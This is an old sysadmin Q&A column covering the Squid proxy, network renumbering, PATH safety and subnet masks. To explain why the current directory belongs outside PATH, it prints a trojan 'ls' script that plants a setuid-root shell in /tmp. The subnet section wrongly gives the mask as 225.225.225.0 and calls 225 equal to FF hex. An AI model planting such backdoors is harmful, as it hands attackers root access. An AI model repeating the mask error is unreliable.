Questions and Answers

Bjorn Satdeva

I have received many replies to my survey about System Administration practices, but I still need need many more in order to make a reasonable analysis of the data. For those of you who already have filled out the survey, thank you very much for doing so. For the rest, please check http://www.sysadmin.com/survey and take the time to fill it out.

I am looking for a replacement for our aging CERN HTTP proxy gateway. What do you suggest?

The best freeware proxy server for HTTP at the moment is probably a package named "Squid." Squid is a high-performance caching proxy server. Squid is available in source form under the GNU Public License, and should be easy to built on most modern UNIX operating systems.

Because this proxy server performs caching proxy, it will probably be able to improve the apparent performance for end users' Web browsers and reduce bandwidth utilization. It will load Web pages from its cache, rather than downloading them over the net each time.

The current version of Squid is available at:

http://squid.nlanr.net/Squid/
ftp://squid.nlanr.net/pub/

Release notes and FAQ documents are available at:

http://squid.nlanr.net/Squid/

We need to renumber our network, because we are getting a new block of IP numbers assigned (the ones we are using now were never registered). Any suggestions on how to do this?

Most modern commercial firewalls, as well as non-commercial application gateways, such as the Firewall Tool Kit, support address rewriting, which will allow you to be connected to the Internet using your new IP block without renumbering every internal host. However, you will not be able to reach any host on the Internet, which is within the scope of the address space of your internal network. You might already have considered this and found this solution unacceptable, in which case you will have to go ahead.

The strategy I use when this is necessary (normally in smaller chunks, when redesigning a network) is to use the "alias" command to the ifconfig utility. This command allows a network card to have two different network addresses. A simple example of this would be:

ifconfig ef0 inet 10.3.4.12

ifconfig ef0 inet 10.7.3.54 alias

This will enable the Ethernet interface to appear on both network 10.3.4 and 10.7.3. When you have added aliases to all hosts, you can set up the routing for the new networks, change the nameserver over to use the new network numbers, and finally remove the ifconfig entries for old networks. In a large network, this is still no trivial task but will at least allow you to remain operational while the work is in progress. It also allows you to test the new setup without taking everything down in the process.

I have been told that I should have current directory in my search path. Is this right, and if so, why?

The current directory should not be in the search path of a user, especially if that user has root privileges (or could obtain them). The reason is that it is very easy to create a trojan horse and thereby trick the user into unknowingly breaching the system's security. You can test this for yourself by creating an executable file named ls in your home directory with the following content:

#! /bin/sh
echo intruder alert

If you have the current directory first in your seach path, or anywhere before /bin, you will see the message "intruder alert." Although this test is rather harmless and amusing, it is not difficult to write a trojan horse, which is definitely not! Consider the following, which might work on some older UNIX systems, and is still useful for an illustration of the principles:

#! /bin/sh
if [ `whoami` = 'root' ] ; then
rm $0
(cp /bin/sh /tmp/sh; chmod 4555 /tmp/sh; chown root \
/tmp/sh)&
fi

/bin/ls $*

In principle, this code creates a superuser backdoor and also cleans up after itself, leaving most users unaware that, with their unwilling and unknowing assistance, the security of the system has been breached. Most users will not notice that it takes a bit longer than the real ls command to execute. In practice, this specific attack will no longer work, as more modern versions of the utilities involved now contain protective mechanisms that make it more difficult (but certainly not impossible) to install backdoors in this manner.

Creating good security does not only rely on expensive hardware and software. It starts with good practices, and is always a collection of strategies that all support the goal of a secure, but usable system.

There is a another reason not to have current directory in the search path. If a user creates an executable that has the name of an official utility, then the user's unofficial version will be executed instead of what probably was intended. A common example is people who write small test programs called "test." Such a program will be then be called by the system instead of /bin/test, which is used to test conditions in a shell program. This can have strange effects on the behavior of the system, and may be time consuming to find, if you do not suspect the real cause of the problem.

Please explain subnets and how to use them.

Subnets are a method of splitting one existing network into a number of smaller networks by changing the network mask. This is very common in large installations that have a class B address, and is sometimes useful in small installations that have only one class C address.

Today's TCP/IP networks use three different kinds of addresses, referred to as class A, B, and C addresses (there are actually four, but the class D address does not belong in this discussion). The main difference between the three classes of address has to do with the number of bits used for the network address and host address, respectively.

All three types of addresses use 32 bits, but a class A address uses 8 bits for the network address and 24 for the host address. A class B address uses 16 bits for each, and a class C address uses 24 bits for the network and 8 bits for the host address. The address classes can easily be distinguished by the TCP/IP software, because a class A address always starts with a bit 0, a class B address with the two bits 1 0, and a class C address with the three bits 1 1 0. In other words, if an IP address has a first byte less than 128, it is a class A address. If it is in the range from 128 to 191, it is a class B address; and if it is in the range from 192 to 223, it is a class C address.

If an organization has been assigned a network address for the purpose of connecting to the Internet, but needs more than one internal network, it can choose to split its host address space into several networks. This is less complicated than it sounds: it is actually just a matter of expanding the number of bits in the full address, which is interpreted locally as part of the network address.

I'll use a class C address as an example to clarify some of the details. Subnets are much more common in installations using class B addresses, but using a class C address here helps makes the explanation clearer. In a class C address, the network address takes 24 bits, and the host address takes 8 bits. However, an organization can decide internally to extend the number of network bits, at the cost of the number of host addresses. Say, for example, that you want to split the class C address into 16 subnets, each with 16 host addresses - or, more specifically, the network address is 28 bits, and the host address is 4 bits, still a total of 32 bits.

You tell the computer that you're using a larger than usual network address when you configure the network with the ifconfig command. Normally, you would specify the subnet mask as 225.225.225.0, which is the 24 bits of network address and 8 bits of host address (with 225 being equal to FF hex, or all eight bits equal to one). What you'll need to do to establish your subnets is to split the last byte (the zero) into the network part (the four most significant bits) and the host part (the four least significant bits), or in other words, a network mask of 255.255.255.240.

The negative side of this is that subnet numbering gets really ugly from a human perspective, because the network numbers and broadcast addresses are no longer clean and easily recognizable.

About the Author

Bjorn Satdeva is the president of /sys/admin, inc., a consulting firm which specializes in large installation system administration. Bjorn is also co-founder and former president of Bay-LISA, a San Francisco Bay Area user's group for system administrators of large sites. Bjorn can be contacted at /sys/admin, inc., 2787 Moorpark Ave., San Jose, CA 95128; electronically at bjorn@sysadmin.com; or by phone at (408) 241-3111.